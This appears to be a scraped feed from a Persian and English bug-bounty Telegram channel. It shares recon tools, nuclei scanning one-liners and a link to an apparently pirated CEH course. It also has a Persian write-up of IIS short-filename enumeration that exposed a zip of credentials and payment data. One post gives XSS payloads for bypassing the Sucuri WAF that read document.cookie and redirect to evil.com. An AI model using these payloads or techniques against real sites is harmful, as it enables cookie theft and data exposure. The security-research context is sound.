The Time Machine - Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not
https://github.com/anmolksachan/TheTimeMachine?tab=readme-ov-file
https://yangx.top/rootdr_research Join to channel For more (:
#BugBounty
#Tools
#Link
https://github.com/anmolksachan/TheTimeMachine?tab=readme-ov-file
https://yangx.top/rootdr_research Join to channel For more (:
#BugBounty
#Tools
#Link
👍6
Vulnerability Checklist for bugbounty and penetration testing
https://github.com/Az0x7/vulnerability-Checklist/
For more join to channel (:
https://yangx.top/rootdr_research
#web
#bugbounty
#Link
#Payloads
https://github.com/Az0x7/vulnerability-Checklist/
For more join to channel (:
https://yangx.top/rootdr_research
#web
#bugbounty
#Link
#Payloads
GitHub
GitHub - Az0x7/vulnerability-Checklist: This repository contain a lot of web and api vulnerability checklist , a lot of vulnerability…
This repository contain a lot of web and api vulnerability checklist , a lot of vulnerability ideas and tips from twitter - Az0x7/vulnerability-Checklist
👍6
Certified Ethical Hacker (CEH) v11
38 GB
https://mega.nz/folder/mOQTSCQS#NhXNE3XlL6fkGun83Yjwcw
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#BugBounty
#Link
38 GB
https://mega.nz/folder/mOQTSCQS#NhXNE3XlL6fkGun83Yjwcw
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#BugBounty
#Link
❤9👍6
آسیب پذیری با امتیاز 7.5 در برنامه باگ بانتی:
بعد از Subdomain Enumration از تارگت به صفحه sub.target.com صفحه پیشفرض وب سرور IIS رو پیدا کردم.
دایرکتوری و فایل های حساس رو فاز کردم ولی نتیجه نداشت. بعدش از طریق روشی که سروش دلیلی محقق وب ایرانی کشف کرده بود،
به بررسی وجود آسیب پذیری IIS Short File Name Enumeration رفتم که تونستم وجود این آسیب پذیری رو با این ابزار تایید کنم و یکسری اسم فایل که اسم تقریبی بودن رو پیدا کردم.
ازجمله yechizi.zip که البته این yechizi ناقص بود و با حدس و سعی کردن تونستم اسم فایل رو حدس بزنم و این فایل 10 مگابایتی رو دانلود کنم.
فایل شامل:کردنشیال دیتابیس،اطلاعات پرداختی،کمپین های مالی و سورس کد بود، که با توجه به محدوده پرداختی کمپانی رقم بالا بهش تعلق گرفت.
پس این صفحه رو پیدا کردید این متد فراموش نشه (:
امیدوارم این تجربه براتون مفید بوده باشه.
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#BugBounty
#Link
بعد از Subdomain Enumration از تارگت به صفحه sub.target.com صفحه پیشفرض وب سرور IIS رو پیدا کردم.
دایرکتوری و فایل های حساس رو فاز کردم ولی نتیجه نداشت. بعدش از طریق روشی که سروش دلیلی محقق وب ایرانی کشف کرده بود،
به بررسی وجود آسیب پذیری IIS Short File Name Enumeration رفتم که تونستم وجود این آسیب پذیری رو با این ابزار تایید کنم و یکسری اسم فایل که اسم تقریبی بودن رو پیدا کردم.
ازجمله yechizi.zip که البته این yechizi ناقص بود و با حدس و سعی کردن تونستم اسم فایل رو حدس بزنم و این فایل 10 مگابایتی رو دانلود کنم.
فایل شامل:کردنشیال دیتابیس،اطلاعات پرداختی،کمپین های مالی و سورس کد بود، که با توجه به محدوده پرداختی کمپانی رقم بالا بهش تعلق گرفت.
پس این صفحه رو پیدا کردید این متد فراموش نشه (:
امیدوارم این تجربه براتون مفید بوده باشه.
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#BugBounty
#Link
👍19🔥7❤2
یک نفر اومده با بازی شطرنج بین دوتا بات یک روش استگانوگرافی ابداع کرده..
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://yangx.top/rootdr_research
#Link
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://yangx.top/rootdr_research
#Link
X (formerly Twitter)
javad (@First_javad) on X
یه برنامهنویس ۱۸ ساله اهل انگلیس به اسم wilson اومده یه کار خیلی فان با سایتهای آنلاین شطرنج انجام داده. در حقیقت تونسته یه ربات بسازه که با بازی شطرنج میشه یه فضای کاملا رایگان و نامحدود داشت برای آپلود هرچیزی که دوست دارید :)
#رشتو
#رشتو
❤2
یک چنل با محتوای بدرد بخور:
https://yangx.top/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
https://yangx.top/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
Telegram
Bugbounty Tips
research and sharing in cybersecurity
👍15🔥1
https://github.com/coffinxp/nuclei-templates
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
GitHub
GitHub - coffinxp/nuclei-templates
Contribute to coffinxp/nuclei-templates development by creating an account on GitHub.
👍5👎1🔥1
Sucuri WAF Bypass:
payload:
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
payload:
<a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href="javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
👍3👀2
Logger++ Custom Filters
A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles
https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#bugbounty
A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles
https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#bugbounty
GitHub
GitHub - bnematzadeh/LoggerPlusPlus-API-Filters: A comprehensive list of custom filters for Logger++ to identify various vulnerabilities…
A comprehensive list of custom filters for Logger++ to identify various vulnerabilities in different API styles - bnematzadeh/LoggerPlusPlus-API-Filters
👍9